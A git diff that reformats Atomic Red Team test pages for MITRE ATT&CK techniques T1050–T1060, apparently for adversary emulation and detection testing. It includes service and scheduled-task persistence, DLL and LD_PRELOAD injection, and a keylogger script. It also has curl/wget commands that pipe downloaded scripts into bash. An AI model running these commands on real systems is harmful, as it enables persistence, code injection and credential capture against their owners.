## Atomic Test #1 - Service Installation CMD + Download an executable from github and start it as a service. -Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. +Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which +will create and start the service. Results will output via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1050\bin\AtomicService.exe| | service_name | Name of the Service | String | AtomicTestService| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd sc.exe create #{service_name} binPath= #{binary_path} @@ -39,50 +43,49 @@ sc.exe start #{service_name} ``` #### Cleanup Commands: + ```cmd sc.exe stop #{service_name} >nul 2>&1 sc.exe delete #{service_name} >nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Service binary must exist on disk at specified location (#{binary_path}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{binary_path}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" ``` - - -

## Atomic Test #2 - Service Installation PowerShell + Installs A Local Service via PowerShell. -Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. +Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then +use `New-Service` and `Start-Service` to start service. Results will be displayed. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1050\bin\AtomicService.exe| | service_name | Name of the Service | String | AtomicTestService| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" @@ -90,27 +93,28 @@ Start-Service -Name "#{service_name}" ``` #### Cleanup Commands: + ```powershell Stop-Service -Name "#{service_name}" 2>&1 | Out-Null try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} catch {} ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Service binary must exist on disk at specified location (#{binary_path}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{binary_path}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1053.md b/Atomic_Threat_Coverage/Triggers/T1053.md index 40d528c1..af7af2ca 100644 --- a/Atomic_Threat_Coverage/Triggers/T1053.md +++ b/Atomic_Threat_Coverage/Triggers/T1053.md @@ -1,8 +1,12 @@ # T1053 - Scheduled Task + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053) +
Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the remote system. (Citation: TechNet Task Scheduler Security) -An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.
+An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to +conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context +of a specified account. ## Atomic Tests @@ -14,10 +18,10 @@ An adversary may use task scheduling to execute programs at system startup or on - [Atomic Test #4 - Powershell Cmdlet Scheduled Task](#atomic-test-4---powershell-cmdlet-scheduled-task) -
## Atomic Test #1 - At.exe Scheduled task + Executes cmd.exe Note: deprecated in Windows 8+ @@ -25,70 +29,53 @@ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd at 13:20 /interactive cmd ``` - - - - -

## Atomic Test #2 - Scheduled task Local -Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - -**Supported Platforms:** Windows - +Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| | time | What time 24 Hour | String | 72600| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} ``` #### Cleanup Commands: + ```cmd SCHTASKS /Delete /TN spawn /F >nul 2>&1 ``` - - - -

## Atomic Test #3 - Scheduled task Remote + Create a task on a remote system. -Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. +Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| @@ -97,39 +84,30 @@ Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe | user_name | Username DOMAIN\User | String | DOMAIN\user| | password | Password | String | At0micStrong| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} ``` #### Cleanup Commands: + ```cmd SCHTASKS /Delete /TN "Atomic task" /F >nul 2>&1 ``` - - - -

## Atomic Test #4 - Powershell Cmdlet Scheduled Task + Create an atomic scheduled task that leverages native powershell cmdlets. -Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. +Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $Action = New-ScheduledTaskAction -Execute "calc.exe" @@ -141,12 +119,9 @@ Register-ScheduledTask AtomicTask -InputObject $object ``` #### Cleanup Commands: + ```powershell Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1055.md b/Atomic_Threat_Coverage/Triggers/T1055.md index 6f98eef1..8181dc62 100644 --- a/Atomic_Threat_Coverage/Triggers/T1055.md +++ b/Atomic_Threat_Coverage/Triggers/T1055.md @@ -1,27 +1,53 @@ # T1055 - Process Injection + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1055) +
Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. ### Windows -There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017) - -* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread. -* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017) -* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended. -* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table) -* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017) +There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame +Process Injection July 2017) + +* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking + execution by creating a remote thread. +* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) + then invoking execution with either additional code or by creating a remote thread. The displacement of the injected + code introduces the additional requirement for functionality to remap memory references. Variations of this method + such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing + into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017) +* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. + Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended. +* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: + Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A + variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious + code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via + an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another + variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: + Microsoft Atom Table) +* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to + redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov + 2017) ### Mac and Linux -Implementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle) +Implementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed +Needle) -* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997) -* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle) -* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle) -* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009) +* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn + application programming interface (API) can be used to dynamically load a library (shared object) in a process which + can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997) +* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed + Needle) +* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. + This technique is very rare due to its complexity. (Citation: Uninformed Needle) +* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the + linux-vdso.so shared object. (Citation: VDSO hijack 2009) -Malware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.
+Malware commonly utilizes process injection to access system resources through which Persistence and other environment +modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and +further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication +channel. ## Atomic Tests @@ -35,166 +61,139 @@ Malware commonly utilizes process injection to access system resources through w - [Atomic Test #5 - svchost writing a file to a UNC path](#atomic-test-5---svchost-writing-a-file-to-a-unc-path) -
## Atomic Test #1 - Process Injection via mavinject.exe + Windows 10 Utility To Inject DLLS. -Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. +Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to +perform process injection in T1055.dll. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055\src\x64\T1055.dll| | process_id | PID of input_arguments | Integer | (get-process spoolsv).id| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $mypid = #{process_id} mavinject $mypid /INJECTRUNNING #{dll_payload} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Utility to inject must exist on disk at specified location (#{dll_payload}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" ``` - - -

## Atomic Test #2 - Shared Library Injection via /etc/ld.so.preload -This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. - -Upon successful execution, bash will echo `../bin/T1055.so` to /etc/ld.so.preload. - -**Supported Platforms:** Linux +This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used +by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. +Upon successful execution, bash will echo `../bin/T1055.so` to /etc/ld.so.preload. +**Supported Platforms:** Linux #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_shared_library | Path to a shared library object | Path | ../bin/T1055.so| - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash echo #{path_to_shared_library} > /etc/ld.so.preload ``` - - - - -

## Atomic Test #3 - Shared Library Injection via LD_PRELOAD -This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. - -Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. - -**Supported Platforms:** Linux +This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by +threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. +Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output +will be via stdout. +**Supported Platforms:** Linux #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_shared_library | Path to a shared library object | Path | /opt/AtomicRedTeam/atomics/T1055/bin/T1055.so| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash LD_PRELOAD=#{path_to_shared_library} ls ``` - - - - -

## Atomic Test #4 - Process Injection via C# + Process Injection using C# reference: https://github.com/pwndizzle/c-sharp-memory-injection Excercises Five Techniques + 1. Process injection 2. ApcInjectionAnyProcess 3. ApcInjectionNewProcess 4. IatInjection 5. ThreadHijack -Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. + Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | exe_binary | Output Binary | Path | T1055.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd .\bin\#{exe_binary} ``` - - - - -

## Atomic Test #5 - svchost writing a file to a UNC path + svchost.exe writing a non-Microsoft Office file to a file with a UNC path. -Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file. +Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with +output to a txt file. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd copy C:\Windows\System32\cmd.exe C:\svchost.exe @@ -202,13 +201,10 @@ C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt ``` #### Cleanup Commands: + ```cmd del C:\T1055.txt >nul 2>&1 del C:\svchost.exe >nul 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1056.md b/Atomic_Threat_Coverage/Triggers/T1056.md index 40ae4ee8..174225f6 100644 --- a/Atomic_Threat_Coverage/Triggers/T1056.md +++ b/Atomic_Threat_Coverage/Triggers/T1056.md @@ -1,40 +1,47 @@ # T1056 - Input Capture + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1056) +
Adversaries can use methods of capturing user input for obtaining credentials for [Valid Accounts](https://attack.mitre.org/techniques/T1078) and information Collection that include keylogging and user input field interception. -Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012) +Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: +Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC +prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012) -Keylogging is likely to be used to acquire credentials for new access opportunities when [Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises. +Keylogging is likely to be used to acquire credentials for new access opportunities +when [Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an +adversary to remain passive on a system for a period of time before an opportunity arises. -Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service. (Citation: Volexity Virtual Private Keylogging)
+Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit +credentials of users who attempt to log into the service. This variation on input capture may be conducted +post-compromise using legitimate administrative access as a backup measure to maintain network access +through [External Remote Services](https://attack.mitre.org/techniques/T1133) +and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of +the externally facing web service. (Citation: Volexity Virtual Private Keylogging) ## Atomic Tests - [Atomic Test #1 - Input Capture](#atomic-test-1---input-capture) -
## Atomic Test #1 - Input Capture + Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/src/Get-Keystrokes.ps1) Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) -Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. +Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | filepath | Name of the local file, include path. | Path | $env:TEMP\key.log| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Set-Location $PathToAtomicsFolder @@ -42,12 +49,9 @@ Set-Location $PathToAtomicsFolder ``` #### Cleanup Commands: + ```powershell Remove-Item $env:TEMP\key.log -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1057.md b/Atomic_Threat_Coverage/Triggers/T1057.md index aa4788d2..90a99e8d 100644 --- a/Atomic_Threat_Coverage/Triggers/T1057.md +++ b/Atomic_Threat_Coverage/Triggers/T1057.md @@ -1,10 +1,13 @@ # T1057 - Process Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1057) +
Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. ### Windows -An example command that would obtain details on processes is "tasklist" using the [Tasklist](https://attack.mitre.org/software/S0057) utility. +An example command that would obtain details on processes is "tasklist" using +the [Tasklist](https://attack.mitre.org/software/S0057) utility. ### Mac and Linux @@ -16,62 +19,44 @@ In Mac and Linux, this is accomplished with the ps command. ## Atomic Test #1 - Process Discovery - ps + Utilize ps to identify processes. -Upon successful execution, sh will execute ps and output to /tmp/loot.txt. +Upon successful execution, sh will execute ps and output to /tmp/loot.txt. **Supported Platforms:** macOS, Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | path of output file | path | /tmp/loot.txt| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh ps >> #{output_file} ps aux >> #{output_file} ``` - - - - -

## Atomic Test #2 - Process Discovery - tasklist + Utilize tasklist to identify processes. -Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. +Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd tasklist ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1058.md b/Atomic_Threat_Coverage/Triggers/T1058.md index d55b31fc..4bc1c887 100644 --- a/Atomic_Threat_Coverage/Triggers/T1058.md +++ b/Atomic_Threat_Coverage/Triggers/T1058.md @@ -1,44 +1,43 @@ # T1058 - Service Registry Permissions Weakness + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1058) +
Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1086), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security) -If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). +If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then +adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the +service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain +persistence and/or privilege escalation to the account context the service is set to execute under (local/domain +account, SYSTEM, LocalService, or NetworkService). -Adversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: TrustedSignal Service Failure)(Citation: Twitter Service Recovery Nov 2017)
+Adversaries may also alter Registry keys associated with service failure parameters (such as +FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally +corrupted.(Citation: TrustedSignal Service Failure)(Citation: Twitter Service Recovery Nov 2017)
## Atomic Tests - [Atomic Test #1 - Service Registry Permissions Weakness](#atomic-test-1---service-registry-permissions-weakness) -
## Atomic Test #1 - Service Registry Permissions Weakness -Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + +Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | weak_service_name | weak service check | String | weakservicename| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1059.md b/Atomic_Threat_Coverage/Triggers/T1059.md index bc8d615e..f40d371d 100644 --- a/Atomic_Threat_Coverage/Triggers/T1059.md +++ b/Atomic_Threat_Coverage/Triggers/T1059.md @@ -1,38 +1,33 @@ # T1059 - Command-Line Interface + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059) +
Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https://attack.mitre.org/techniques/T1053)). -Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.
+Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an +operation. ## Atomic Tests - [Atomic Test #1 - Command-Line Interface](#atomic-test-1---command-line-interface) -
## Atomic Test #1 - Command-Line Interface -Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. - -Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. - -**Supported Platforms:** macOS, Linux - +Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control +the server. +Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker +file in `/tmp/art-fish.txt`. +**Supported Platforms:** macOS, Linux -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash" bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash" ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1060.md b/Atomic_Threat_Coverage/Triggers/T1060.md index c13aa68f..c6870dcb 100644 --- a/Atomic_Threat_Coverage/Triggers/T1060.md +++ b/Atomic_Threat_Coverage/Triggers/T1060.md @@ -1,39 +1,59 @@ # T1060 - Registry Run Keys / Startup Folder + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1060) +
Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. The following run keys are created by default on Windows systems: + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce -The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) +The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not +created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as +a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a " +Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " +C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) The following Registry keys can be used to set startup folder items for persistence: + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders The following Registry keys can control automatic startup of services during boot: + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run -The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows 